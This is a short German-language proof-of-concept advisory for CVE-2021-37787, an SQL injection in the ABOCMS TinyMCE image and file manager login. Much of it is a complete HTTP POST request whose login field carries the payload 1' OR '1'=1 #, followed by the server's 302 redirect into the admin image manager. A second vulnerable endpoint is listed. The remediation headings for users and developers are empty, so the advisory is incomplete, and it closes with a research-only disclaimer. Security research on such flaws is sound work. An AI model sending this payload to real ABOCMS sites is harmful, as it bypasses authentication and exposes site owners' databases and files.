
CVE-2021-37787
Eine kritische SQL-Injection-Schwachstelle existiert in ABOCMS im TinyMCE-Modul. Die Schwachstelle entsteht aufgrund unzureichender Eingabebereinigung in der Interaktion des TinyMCE-Moduls mit der Datenbank, die es einem Angreifer ermöglicht, bösartige SQL-Abfragen einzuschleusen. Dies kann zu unbefugtem Datenzugriff, -änderung oder sogar zur vollständigen Kompromittierung der zugrunde liegenden Datenbank führen.
Der anfällige Endpunkt befindet sich in der Verarbeitung von benutzereingegebenen Daten durch das TinyMCE-Modul. Ein Angreifer kann diesen Fehler ausnutzen, um beliebige SQL-Befehle auszuführen.
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded
return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html
Die Schwachstelle kann über den folgenden Endpunkt ausgelöst werden:
/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php
Für Benutzer:
Für Entwickler:
Dieses PoC dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Verwenden Sie diesen Code nicht, um Systeme oder Netzwerke zu schädigen, ohne die ausdrückliche Erlaubnis des Eigentümers. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses PoC verursacht werden.